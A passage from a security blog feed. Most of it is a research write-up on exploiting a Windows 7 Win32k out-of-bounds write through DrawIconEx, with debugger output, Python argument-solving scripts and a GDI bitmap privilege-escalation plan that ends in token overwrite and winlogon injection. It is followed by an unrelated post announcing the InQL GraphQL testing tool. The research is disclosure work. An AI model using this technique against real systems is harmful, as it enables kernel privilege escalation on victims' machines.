var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_64h )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical to arg5 of DrawIconEx (0xfebffffc), but it gives the feeling that the two are related. Changing the value from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd000000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5, the lower 32 bits of oob_target remain c7000240. Additionally, a decrease in the value of arg5 (treating it as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

image 4

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

image 5

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjacent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SURFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how loop_iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The notes.txt file in my GitHub repo contains extra detail on the relevant function, vInitStrDDA.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.
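As a sanity check, the formula can be run against the arg5 values tried earlier and compared with the addresses seen in WinDbg (fffff904, fffff903 and fffff90a against a base of fffff900). This is a small sketch reusing the same arithmetic; the helper name is made up, and it shifts the product right by 32 bits instead of masking it.

```python
BITMAP_WIDTH = 0x51500  # arg1 of CreateCompatibleBitmap() used in this post


def upper32_increment(arg5, width=BITMAP_WIDTH):
    """How far the upper 32 bits of oob_target move for a given arg5."""
    loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30
    l_delta = width // 8
    return (loop_iterations * l_delta) >> 32


# arg5 -> increment read off the debugger output (fffff90X'c7000240)
OBSERVED = {0xfebffffc: 0x4, 0xff000000: 0x3, 0xfd000000: 0xa}

for arg5, seen in OBSERVED.items():
    print("arg5=%08x predicted=%x observed=%x"
          % (arg5, upper32_increment(arg5), seen))

# The value used in the snippet above moves the target by exactly one step.
print("arg5=ffb00000 predicted=%x" % upper32_increment(0xffb00000))  # 1
```

All three observed addresses match the prediction, and arg5 = 0xffb00000 yields an increment of 1, i.e. a write somewhere in the fffff901 range.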

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

image 5

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx, the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is equivalent to DI_COMPAT | DI_IMAGE, where DI_IMAGE “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 (DI_MASK) changes execution flow to the OR branch.
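For reference, a small helper that decodes a diFlags value into its flag names. The constants are the DI_* values from winuser.h; the helper itself is only an illustration and is not part of the exploit code.

```python
# DI_* flag bits from winuser.h (DI_NORMAL is DI_MASK | DI_IMAGE).
DI_FLAGS = {
    0x0001: "DI_MASK",
    0x0002: "DI_IMAGE",
    0x0004: "DI_COMPAT",
    0x0008: "DI_DEFAULTSIZE",
    0x0010: "DI_NOMIRROR",
}


def decode_di_flags(value):
    """Return the names of the DI_* bits set in value, lowest bit first."""
    return [name for bit, name in sorted(DI_FLAGS.items()) if value & bit]


print(decode_di_flags(0x6))  # ['DI_IMAGE', 'DI_COMPAT']
print(decode_di_flags(0x1))  # ['DI_MASK']
```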

Exploitation Strategy

Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilities are a far cry from an all-powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan0 and sizlBitmap. pvScan0 points to the actual bitmap data. This data can be read/written to using GetBitmapBits and SetBitmapBits. sizlBitmap is two dwords that contain the width and height of the bitmap. Classically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan0 with the address of the second SURFOBJ’s (referred to as Worker) pvScan0 member. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan0 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan0 using a call to SetBitmapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan0 address can be overwritten. This second SURFOBJ can then be used via SetBitmapBits for a powerful write-what-where primitive.
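The sizlBitmap idea can be modeled in a few lines of Python. This is a toy simulation only: the 16-byte header, the one-byte-per-pixel sizing and the ToyPool class are inventions for illustration and do not reflect the real SURFOBJ layout or the GDI API.

```python
import struct

HDR = struct.Struct("<IIQ")  # toy header: width, height, pvScan0


class ToyPool:
    """Flat bytearray standing in for contiguous kernel pool memory."""

    def __init__(self, size):
        self.mem = bytearray(size)
        self.next_free = 0

    def create_bitmap(self, width, height):
        # Header and pixel data are laid out back to back.
        addr = self.next_free
        data_addr = addr + HDR.size
        HDR.pack_into(self.mem, addr, width, height, data_addr)
        self.next_free = data_addr + width * height
        return addr

    def set_bitmap_bits(self, bitmap, data):
        # The copy is bounded only by the size stored in the header.
        width, height, pv_scan0 = HDR.unpack_from(self.mem, bitmap)
        count = min(len(data), width * height)
        self.mem[pv_scan0:pv_scan0 + count] = data[:count]
        return count


pool = ToyPool(0x1000)
second = pool.create_bitmap(0x10, 0x1)
third = pool.create_bitmap(0x10, 0x1)
target = 0x800  # arbitrary address we want to write to

# Simulate the OOB write: OR a bit into the height of 'second'.
(height,) = struct.unpack_from("<I", pool.mem, second + 4)
struct.pack_into("<I", pool.mem, second + 4, height | 0x10)

# 'second' can now write past its own data into the header of 'third'.
pool.set_bitmap_bits(second, b"B" * 0x10 + HDR.pack(0x10, 0x1, target))

# 'third' now writes wherever its corrupted pvScan0 points.
pool.set_bitmap_bits(third, b"WRITE")
print(bytes(pool.mem[target:target + 5]))  # b'WRITE'
```

The point of the model is that corrupting a size field is enough: the out-of-bounds copy then reaches the neighbouring object's data pointer, which in turn gives a reusable arbitrary write.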

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c7000000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocated at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
3. Calculate loop_iterations*lDelta such that oob_target is equal to fffff901'c7000240.
4. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
5. Use SetBitmapBits with second SURFOBJ to overwrite pvScan0 of third SURFOBJ.
6. Arbitrary reusable write is now obtained.
7. Typical EoP: overwrite process token privileges and inject into winlogon.exe.

A bad visual representation:

image 6

Every step is easily accomplished with the exception of step 4. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. This is guaranteed to increase the OR’d value, which is what is required. Accurately targeting width or height of sizlBitmap is the challenge. Recall from earlier in the blog post that oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

image 7

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

image 8

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in pseudo-code as:

initial_value = 0xfffff901c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2) 
{
    write_location_1 = initial_value + lDelta * loop_count;
    write_location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s sizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...")

# start with size at 0x50000
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8
    # lDelta is always aligned (low 4 bits clear), so skip sizes where it is not
    if (lDelta & 0x0f) == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0, 0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, "
                          "loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))
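When the bitmap width is already fixed, the same equation can be solved directly instead of brute-forced. The sketch below uses the same write_target formula as the brute-force script and the width 0x51500 used throughout this post. The function name and its defaults are my own and are not taken from the exploit code.

```python
def solve_for_width(width, target=0x70038, max_arg1=0xfff, max_arg2=0x10):
    """Find (arg1, arg2) with (arg1 // 0x20) * 4 + 0x240 + arg2 * lDelta == target."""
    l_delta = width // 8
    for arg2 in range(max_arg2):
        remainder = target - 0x240 - arg2 * l_delta
        if remainder < 0:
            break  # larger arg2 values only overshoot further
        if remainder % 4 == 0:
            arg1 = (remainder // 4) * 0x20
            if arg1 < max_arg1:
                return arg1, arg2
    return None


arg1, arg2 = solve_for_width(0x51500)
print("arg1 = %x, arg2 = %x" % (arg1, arg2))  # arg1 = 8c0, arg2 = b
```

For a width of 0x51500 this yields arg1 = 0x8c0 and arg2 = 0xb, which is one of the combinations the brute-force loop would also report.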

Now that all values are understood, all that remains is to write the exploit code.


Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

image 9

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvement to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending on whether the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.


Thanks to Netanel Ben-Simon, Yoav Alon and bee13oy for finding the bug.

InQL Scanner v2 is out!

10 June 2020 at 22:00

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL’s built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc. to automatically generate query templates that can be used for QA / security testing.
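To give a feel for what generating templates from introspection data means, here is a minimal sketch. It is not InQL’s implementation or output format: the function names, the sample schema and the <TYPE> placeholder style are made up for illustration. Only the shape of the introspection response (__schema, queryType, types, fields, args, ofType) follows the GraphQL specification.

```python
def type_name(type_ref):
    """Unwrap NON_NULL / LIST wrappers down to the named type."""
    while type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return type_ref["name"]


def build_query_templates(introspection):
    """Return {field name: query template} for the schema's root query type."""
    schema = introspection["data"]["__schema"]
    root = schema["queryType"]["name"]
    templates = {}
    for gql_type in schema["types"]:
        if gql_type["name"] != root:
            continue
        for field in gql_type.get("fields") or []:
            args = ", ".join("%s: <%s>" % (a["name"], type_name(a["type"]))
                             for a in field.get("args") or [])
            call = "%s(%s)" % (field["name"], args) if args else field["name"]
            templates[field["name"]] = "query { %s }" % call
    return templates


# Hypothetical introspection result for a tiny schema.
SAMPLE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "fields": [
            {"name": "user", "args": [{"name": "id", "type": {
                "kind": "NON_NULL", "name": None,
                "ofType": {"kind": "SCALAR", "name": "ID"}}}]},
            {"name": "version", "args": []},
        ]},
        {"name": "User", "fields": [{"name": "name", "args": []}]},
    ]}}}

for name, template in build_query_templates(SAMPLE).items():
    print(name, "->", template)
```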

In this release, we introduced the ability to have a Jython standalone GUI similar to the Burp one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to be able to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

InQL v2 Editor

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representations of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.
